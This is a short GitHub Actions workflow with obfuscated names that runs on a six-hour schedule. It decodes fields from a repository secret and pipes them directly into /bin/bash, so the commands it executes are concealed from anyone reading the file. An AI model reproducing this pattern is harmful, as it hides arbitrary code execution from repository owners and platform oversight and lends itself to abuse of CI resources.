name: yangduonian3719
on:
  workflow_dispatch:
  schedule:
    - cron: '30 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangduonian3719
        env:
          unib9509: ${{ secrets.unib9509 }}
        run: |
          echo $unib9509 | jq -r .vjan14 | /bin/bash
          echo $hdmml6648 | jq -r .c8 | /bin/bash
          echo $xsb21298 | jq -r .db3 | /bin/bash
          echo $oe405 | jq -r .dhxm70 | /bin/bash

